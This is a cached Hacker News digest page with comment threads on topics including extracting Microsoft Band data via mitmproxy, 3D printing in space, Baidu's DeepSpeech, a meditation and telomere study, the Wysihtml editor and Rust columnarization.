If women only conferences are good at helping women network and communicate safely, I really think we could apply the same argument to men, do we just disregard men who are too afraid or feel uncomfortable around women because we already have too many successful men who don't suffer from this problem?
21
Extracting My Data from the Microsoft Band
78 points by lazyjeff  8 hours ago   21 comments top 9
1
mabbo 8 hours ago 6 replies      
That's a bit disappointing. I was hoping to get one of these bands, but to hear them say that all data is stored on Microsoft's cloud is a bit disconcerting.

I wanted to track my heart rate while I run. I didn't want to let a large company have direct access to my health information.

2
Maarten88 6 hours ago 0 replies      
It seems to use a standard odata format over ssl with oauth token security. I wonder if it's possible to simply attach an Excel worksheet to the data feed (https://support.office.com/en-us/article/Connect-to-an-OData...)
3
pgbovine 3 hours ago 0 replies      
"Clearly, to get sleep events, the app is constructing a REST call."

This is gold :) Nice write-up, Jeff.

4
TazeTSchnitzel 8 hours ago 1 reply      
Interesting they store so little on the device. Does the Band generate a lot of data?
5
sengstrom 5 hours ago 0 replies      
A nice hack and a good list of the things you may want to fiddle with if you want to explore phone applications calling home just in general.
6
ubercow 6 hours ago 0 replies      
The most amusing part for me is the domain name dns-cargo.com
Seems like a random choice. Wonder if this was just some spare throwaway domain they had laying around.
7
lhl 4 hours ago 0 replies      
I started poking around w/ mitmproxy the other day as well, since I had started to get a little tired of waiting (Microsoft has promised an open API/SDK of some sort, but there haven't been any updates to any of the software since release) w/ similar results. (I did this against the iOS app).

So I'll just post a couple notes:

* auth appears to be using OAuth WRAP (deprecated as a spec, but Microsoft appears to use it for Live logins), so I'm sure could be pretty easily extracted for an API library

* As mentioned the API mostly talks to an endpoint on and the returns are gzipped JSON except for a PUT to prodwus0sts.blob.core.windows.net for the binary log of your actual data (there's a subsequent PUT that then sends the UploadId and some other metadata to the API server)

People have mentioned wanting to avoid sending your data to the cloud completely, and that should be completely possible. The easy way atm is that you could just mitm the endpoints and sync as normal w/ the app.

However, there are at least a couple of people that have successfully reverse-engineered the BTLE protocol, although I haven't seen anything fully published yet. This appears to mostly/primarily be based on digging through the Windows client's DLL.

Pic of source w/ some of the BT protocol: https://twitter.com/JustinAngel/status/527955001436418048

Some BT functions: https://twitter.com/JustinAngel/status/528383467742957571

Methods extracted from the dll: https://twitter.com/JustinAngel/status/529876592479047682

(On OSX, strings gives you significantly less useful information, although apparently it was built by 'ianhowle' and there's a native Objective-C "CargoKit" library)

Note, there's one open source project that has theming and plans on building live sensor output: http://unband.nachmore.com/

And there's a closed source phone already that does access all the sensor data in realtime: http://www.windowsphone.com/en-us/store/app/band-sensor-moni...

I'm not too familiar with Windows Phone, but I believe you can access and decompile an unencrypted XAP if you have a rooted Windows Phone to see what it's doing.

I don't really have much experience/use/access to Windows stuff in general, but for someone w/ that kind of experience, I can't imagine it being very hard to deconstruct.

8
zeinzig 5 hours ago 0 replies      
i knew something had to be up when syncing between band and app required internet access! my fitbit always synched with just bluetooth.
9
Tommyatomic 7 hours ago 0 replies      
So far despite the decent specs the Microsoft Band is disappointing to pretty much everyone I've spoken to who bought one. Now that I know how the data storage functions additional disappointment abounds. This is clearly no exception to equating the MS Band as the windows 8 of smartwatches. I am fanatically thrilled I couldn't find one when I wanted to buy one.
22
The Go tree is now open for general work
53 points by thepumpkin1979  5 hours ago   6 comments top
1
jzelinskie 3 hours ago 2 replies      
It would be cool if they could use a bot to help guide people posting pull requests. I'm sure there's a lot of cool ideas to play around with in that space.
23
How We Email Hardware to Space
76 points by steven  8 hours ago   19 comments top 8
1
spiritplumber 13 minutes ago 0 replies      
I'm at the Mars Desert Research Station in Utah. We finally got a 3d printer approved for use, and we've been using it to do a few things. So far customized finger splints, a hose for an EVA pack (these are only semi-simulated; it's insanely cold here, and they provide the hot air to prevent face insensitivity and helmet fogging), and a little gizmo I did that lets you use a safety razor as a scalpel. If you have questions, I will try to give a cogent answer but our bandwidth is very limited and we have a simulated speed of light delay so I can't answer straight away!
2
malandrew 2 hours ago 0 replies      
Why haven't there yet been any projects for milling in space with some sort of vacuum-remelt process for reusing the milled off materials. 3D printing is great and all, but it still doesn't come close to what you can achieve with milling.

That said, this is awesome. I just think that there are pros and cons to both and we shouldn't be focused only on 3D printing.

3
sedachv 2 hours ago 0 replies      
For anyone confused about how you can print the ratcheting mechanism, I think this wrench is probably the new toothless/springless design from Roller Clutch Tools (http://www.rollerclutchtools.net/): http://3dprintingindustry.com/2013/08/20/this-year-3d-printi...
4
double0jimb0 4 hours ago 3 replies      
Scratching head on what the long term goal of this experiment was... (more 3D printing PR?)

Seems like using this manufacturing approach would be a very tough sell for any real mission.

Only benefit of 3D printing at your destination is the ability to manufacture something that was overlooked, so contingency planning. (yea, yea, someday we'll mine the printable materials on site, right...)

For just about any other item that you know you need, it would be much more weight-effective (the golden measure in launch considerations) to just build the part here on earth, where you can maximize specific density and specific strength using materials that 3D printing can't touch. Plus you aren't lugging around a heavy 3D printer + raw materials.

5
aeturnum 5 hours ago 0 replies      
I recall reading about plans to manufacture fuel on the surface of mars for a return trip. I wonder if the goal now is to manufacture fuel and raw 3d printing materials? Seems like it takes some of the pressure off the initial trip loadout.
6
Smushman 8 hours ago 5 replies      
I hope this does not come across as cynical.

As an engineer my first thought when I saw what it printed was how do you turn a bolt with a plastic wrench without breaking the wrench?

7
lostdog 4 hours ago 0 replies      
How cool! Does anyone know what changes they had to make to get their 3D printer to work in microgravity?
8
pjmlp 5 hours ago 1 reply      
Great! Now we just need replicators. :)
24
DeepSpeech: Scaling up end-to-end speech recognition
60 points by cbcase  6 hours ago   18 comments top 5
1
cbcase 6 hours ago 1 reply      
Thought it best to post the arXiv link, but there's some press coverage as well:

- https://gigaom.com/2014/12/18/baidu-claims-deep-learning-bre...
- http://www.forbes.com/sites/roberthof/2014/12/18/baidu-annou...

2
pesenti 3 hours ago 1 reply      
To put it in perspective, my team in IBM Watson has already published better numbers (10.4% WER vs 13.1% WER for Baidu) on the SWB dataset. We haven't run our model on the CH part so we can't compare on the full test set. Paper here: http://www.mirlab.org/conference_papers/International_Confer....
3
greeneggs 2 hours ago 0 replies      
Very nice. I wonder if training can be simplified by training pieces of the model separately, instead of training all together. For example, the DeepSpeech model has three layers of feedforward neurons (where the inputs to the first layer are overlapping contexts of audio), followed by a bi-directional recurrent layer, followed by another feedforward layer. What would the results be if we trained the first layers (perhaps all three) on a different problem, such as autoencoding or fill-in-the-blank (as in word2vec), and then fixed those network weights to train the rest of the network?

Breaking the network up like this would reduce training time and perhaps reduce the needed training data. Since the first layers could be trained without supervision, less labeled data would be needed to train the last two layers. It would also facilitate transferring models between problems; the output of the first few layers, like a word2vec, could be fed into arbitrary other machine learning problems, e.g., translation.

If this does not work, then how about training the whole model together, but only once? The final results are reported for an ensemble of six independently trained networks. What if we started by training one network, and then fixed the first three layers to train other networks? (Instead of fixing the first layers, you could also just give them a slower training rate, although it isn't clear whether that would save you much.)

4
brandonb 5 hours ago 1 reply      
This is very fast progress from Baidu's Silicon Valley AI lab! Andrew Ng only joined Baidu in May, and (nearly?) all of the co-authors of this paper have joined him since then: http://www.technologyreview.com/news/527301/chinese-search-g...

Congrats to Carl, Sanjeev, Andrew, and the others.

5
gok 2 hours ago 2 replies      
So with 300 hours of training data it does worse on SWB than a DNN-HMM, or even a GMM-HMM system? But when they give it 2300 hours of training data, it can beat those 300 hour trained systems?

This is still very cool, but that comparison doesn't seem fair at all.

25
The Story of Siri, by its founder [video]
52 points by ar7hur  6 hours ago   11 comments top 4
1
jud_white 1 hour ago 0 replies      
Oct 4: Apple launches Siri

Oct 5: Steve Jobs dies

  One kind of side note. On October 5th, Steve Jobs died.
  He had been involved in a lot of the process leading up to it.
  We know that he was watching this launch from his house.
  I don't know what he thought about it, but I like to project
  that he saw it, said "It is good. This is the future, Apple's
  in the middle of it. I can go now." I don't know if that's true,
  but that's a projection that I like to put onto it.

I suppose this is the kind of statement you could expect from the creator of a predictive personal assistant, but wow.

2
bsaul 1 hour ago 0 replies      
This video should be broadcasted to every politician remotely involved in industry, job creation, research or education (yes, that means probably all of them) to show how a successful technology really is the (slow) product of an entire ecosystem combined with great minds of all kinds.
3
ar7hur 3 hours ago 1 reply      
Synopsis:

    Walking backward in time, Adam discussed the technical
    history of Siri as well as how the vision of virtual
    personal assistants evolved over time. He wowed the
    audience with a video from 1987 on a concept from Apple
    where predicted a Siri like device 24 years in the future
    and was only off by 2 weeks.

4
natch 5 hours ago 1 reply      
"Sorry, because of its privacy settings, this video cannot be played here."

Is this only me? I'm not blocking cookies or anything like that.

26
Safe way to upload files to Dropbox from an untrusted computer
33 points by sepeth  4 hours ago   3 comments top 2
1
socceroos 1 hour ago 0 replies      
'Safe' from the sense that it makes it difficult to compromise the security credentials of your account. However, this will do nothing to stop you from inadvertently uploading ransomware to your account.
2
sophacles 2 hours ago 1 reply      
This seems very similar to SQRL.... https://www.grc.com/sqrl/sqrl.htm how much does it differ?
27
Meditation associated with preserved telomere length in breast cancer patients
28 points by prostoalex  3 hours ago   34 comments top 6
1
tokenadult 1 hour ago 1 reply      
I see after a Google search that it has been mostly popular press outlets without experienced medical reporters who have commented on this story so far. For the most part, what we are seeing online are recycled editions of the study group's press release. The underlying journal publication "Mindfulness-based cancer recovery and supportive-expressive therapy maintain telomere length relative to controls in distressed breast cancer survivors" is open-access,[1] so medically knowledgeable people here can read the study and check whether its methodology makes sense.

I note that the lead author of the study, Linda E. Carlson, is part of a group of cancer researchers promoting "integrative" approaches to cancer treatment. Another cancer researcher commenting on this approach thinks that "integrative" cancer therapy so far promises much more than it can actually deliver in improved patient outcomes.[2] The original headline of the Fast Company article submitted here, already changed by the Hacker News moderation team, is surely wrong, and it's not at all clear that this extraordinary claim will replicate if an independent group of researchers attempt to replicate the results. If I or any of my loved ones should happen to have a case of cancer (which is rather rare in my family), I will ask for advice on how to treat it from a doctor who practices science-based medicine.

[1] http://onlinelibrary.wiley.com/doi/10.1002/cncr.29063/full

[2] http://www.sciencebasedmedicine.org/selling-integrative-onco...

2
anentropic 2 hours ago 0 replies      
It could also have been the yoga: "The first group was randomly assigned to an 8-week cancer recovery program consisting of mindfulness meditation and yoga"

this is a crummy article with a crummy headline about one single study which may or may not also be crummy

3
geekam 2 hours ago 7 replies      
Can people who meditate point to good resources on how and where to start? Books, videos, blogs etc.
4
mrbonner 2 hours ago 2 replies      
Exercise can also change your DNA: http://well.blogs.nytimes.com/2014/12/17/how-exercise-change...

Exposure to radiation can change your DNA.

Heck, everything can change (read mutate) your DNA.

5
steven2012 2 hours ago 0 replies      
Telomeres are not the same as DNA.
6
ajarmst 2 hours ago 3 replies      
A more accurate headline might be that meditation appears to ameliorate genetic damage associated with stress. But I guess that's less surprising, exciting and clickable than implying that meditation causes Lamarckian inheritance.
28
Show HN: Wysihtml Open-source rich text editor for web apps
184 points by olla  14 hours ago   44 comments top 19
1
otherusername 10 hours ago 1 reply      
Something I'd really like is a way to expose CSS styles to the editor easily. One of the major problems I always run into is that my customers try to make things look like the rest of the website by hacking the text a bit.

They'll see a highlighted word or sentence with a bold font, wider spacing and a blue background. So they set the background blue, the font bold and the spacing wider. But really, the editor should provide an intuitive way to apply the <span class="highlight"> element.

Some editors out there do this, but they generally suck in other areas. Wysihtml seems to apply inline CSS. Can it easily apply a class too?

2
olla 14 hours ago 2 replies      
We are trying to revive and modernise a once popular open source editor xing/wysihtml5. It is configurable to be used with and without an iframe. The editable area API is separated from the toolbar so it would be easy to customise or completely rebuild the toolbar logic for your own app.

The Voog team

3
BenjaminN 9 hours ago 1 reply      
"Fast and lightweight" is 200ko?

We have so many choices when it comes to WYSIWYG. My favorite is https://github.com/daviferreira/medium-editor.

4
mhd 10 hours ago 2 replies      
Is there some way to sanitize the output? The prevalence of <br><br> is something I've always disliked about WYSIWYG HTML editors (something a markdown converter doesn't have to struggle with, usually).

I can do paragraphs by not manually breaking lines and instead select the second paragraph's content, then apply the "normal text" style, but this isn't exactly intuitive.

Or one could disallow further linebreaks and thus just create paragraphs when you're entering a linebreak.

5
andybak 7 hours ago 1 reply      
> Unifies line-break handling across browsers (hitting enter will create <br> instead of <p> or <div>)

This implies it isn't configurable and unfortunately - in my view this is the incorrect direction to unify in.

Hasn't even MS Word nowadays standardized on Enter=paragraph break, Shift+Enter=line break?

6
kemayo 10 hours ago 2 replies      
A few feedback points, I suppose...

# Clicking the "no-color" option in the text color-picker doesn't do anything.

# Using the "remove" option on a link inserts a space as well as removing the link, which seems incorrect.

# Using the "remove" option on a link doesn't always remove the entire link. Repro on http://wysihtml.com/ by selecting the word "typewriter", adding a link, then clicking on it again and removing the link. Depending on where you clicked either "type" or "writer" will still be linked.

# Repeatedly toggling tags can get weird. e.g. select a word and keep on clicking the bold/italic/underline button, and note how it'll toggle the tag on, toggle it off, and then just start adding spaces in front of it with every subsequent click.

# Possibly related to the spaces issue, after toggling tags for a bit checking the source generated shows a lot of empty-tags, which is kind of messy.

7
j_s 4 hours ago 0 replies      
There are a lot of commercial options available too; I was reminded of the 'How I reverse-engineered Google Docs' discussion where the author recommended paying $200 for Redactor. Releasing an easily usable full-featured rich text editor is a generous gift!
8
NARKOZ 10 hours ago 1 reply      
For your rails apps you can use 'wysihtml5-rails' gem.

https://github.com/narkoz/wysihtml5-rails

Author plans to update it to use wysihtml as a drop-in replacement.

9
cstigler 4 hours ago 0 replies      
FWIW, we've been pretty happy with the Froala Editor: https://editor.froala.com/
10
WimLeers 6 hours ago 1 reply      
Why fork something that is incomplete, unstable, has very limited test coverage, and doesn't tightly control the generated markup?

CKEditor has had the ACF (Advanced Content Filter) for >1.5 years now. It allows you to very tightly control which tags and attributes are allowed.

This feature, and the rest of CKEditor has much, much more test coverage to account for the many browser quirks (notably in contentEditable) that they have had to work around, to prevent regressions. It's a waste of time for everybody to solve the same problems and work around the same browser quirks over and over again.

The "Ability to add uneditable area inside editor text flow (useful when building modules like video tools, advanced image editor etc)." feature is probably the only interesting feature. But it's nothing compared to CKEditor Widgets, which does exactly this, and much more (think storing structured content but transforming it to the specific markup that a frontend developer wants). Just compare Wysihtml's "advanced" demo to the CKEditor Widgets demo: http://docs.ckeditor.com/#!/guide/dev_widgets

See http://docs.ckeditor.com/#!/guide/dev_advanced_content_filte... for more about ACF and http://docs.ckeditor.com/#!/guide/dev_widgets for more about Widgets.

And yes, it's open source: GPL/LGPL/MPL/commercial: http://ckeditor.com/about/license

If we'd collaborate more rather than reinventing the wheel, we'd get so much further. One does not just write a WYSIWYG editor

11
fredkelly 11 hours ago 2 replies      
Having had the (dis)pleasure of working with TinyMCE on a number of past projects this looks like a no-brainer. The only thing I'm not sure about is the use of `data-wysihtml5-command` attributes to configure the toolbar, is there an option to configure this via a configuration object in JS? - e.g. I just pass the ID of the element I want to use and a set of options?
12
swalsh 11 hours ago 0 replies      
This is very cool, I've used the Telerik editor (http://demos.telerik.com/kendo-ui/editor/index) control in the past, but this might be a decent competitor.
13
metara 11 hours ago 2 replies      
so timid

Try out their beautiful working app: http://voog.com

14
LukeB_UK 9 hours ago 0 replies      
It seems to suffer from tags being left over even after all their content has been deleted. Many editors seem to suffer this too.
15
acomjean 11 hours ago 3 replies      
Cool.

but why no jquery?

Just asking.

As someone who ported an embedded website away from jquery, it was painful, and I've come to really appreciate it

16
matthew86 13 hours ago 0 replies      
Thanks! Been looking for such editor. Will try it out soon.
17
curiously 2 hours ago 0 replies      
so after I create an html how do I "export" out the html code?
18
partsteet 13 hours ago 0 replies      
Looks nice.
19
kaspar-naaber 13 hours ago 0 replies      
Cool!
29
Columnarization in Rust
71 points by steveklabnik  9 hours ago   21 comments top 6
1
kbenson 8 hours ago 1 reply      
So like everyone without a job, I've started to learn Rust. And like everyone who has started to learn Rust, I now feel it is very important to tell you about my experience with it.

Well, that sums that up pretty succinctly. :)

3
mkaufmann 6 hours ago 0 replies      
While I like the construction of the column store and the corresponding API, the claims of the author don't really make sense:

> "... columnarization, a technique from the database community for laying out structured records in a format that is more convenient for serialization than the records themselves."

Column stores in comparison to row stores don't offer any serialization benefit per se. The main benefits are the following, I will be using a record (A,B,C,D,E) as example with all types u32 (4 bytes):

* If you only use some fields you have to load less data from memory/disk into the CPU cache and your working set is more probable to fit into cache. For example when filtering only the records where A=22 and B=45 you only have to actually load x(sizeof(A)+sizeof(B)) = x8 bytes instead of xrecord_size=x20. This can make a very significant difference.

* When using compression to reduce the size of data, columns can often be compressed better because they only contain data of the same type and nature and thus probably share similarities. When using such a small record consisting only of integers it probably won't make a difference. But if e.g. some fields are country abbreviations, textual description or others are ids, one could easily imagine that there are gains.

Coming back to the point about serialization, using the same technique as described in the blog post, there won't[1] be a performance difference between column storage and row storage (e.g. using a struct). The method described in the blog post just lets the data array of the original vector be wrapped by a Vec<u8> without even moving the memory, so the method is independent of the data type that is stored in the vectors. Of course it will only work for data types that do not contain references, otherwise we could get illegal memory access after deserialization (which should be guaranteed by the rust type system because only Copy types are allowed).

The only thing this benchmark is testing is how fast a vector can be initialized.

[1] There can be a space improvement of keeping the data in a column layout compared to row layout when using normal structs. Normal structs normally align the total size to the size of the largest field in the struct. A struct containing i64 and i8 would contain 7 bytes of padding. In a column layout this overhead would be avoided. Still there would not be an improvement in this serialization scheme as it does not actually copy any data.

4
skybrian 7 hours ago 1 reply      
I'm not familiar with Rust, but I wonder how much copying this does for deeply nested types?
5
thomasahle 8 hours ago 6 replies      
Seeing how the Rust community seems to have converged on using `uint` as the default type for array indexing and so on; wouldn't it make sense to reflect that in the complexity of the name of the types?

Instead of (uint, int) we could have (int, sint) or (uint, sint).

6
arthursilva 8 hours ago 1 reply      
Make sure you compile your release/bench builds with --release (if using cargo) or (-O if using rustc).
30
First Experimental Flight of India's Launch Vehicle GSLV Mk-III Successful
83 points by svasan  15 hours ago   9 comments top 4
1
suprgeek 8 hours ago 0 replies      
This is a good first step. The GSLV has been notoriously difficult to get right for ISRO.

Next step is to get the Cryogenic Upper stage to actually provide the critical thrust that will finally power it into a GeoSynchronous orbit. On this mission it was bolted on but passive.

2
robodale 7 hours ago 2 replies      
I'm happy to see other countries are advancing their space capability, and hope this trend continues.
3
listic 5 hours ago 2 replies      
What is the ultimate goal of GSLV? What kind of crew vehicle will it ultimately launch?
4
hamitron 4 hours ago 1 reply      
Those animated flag gifs don't do much to contribute to their credibility.
       cached 19 December 2014 02:02:02 GMT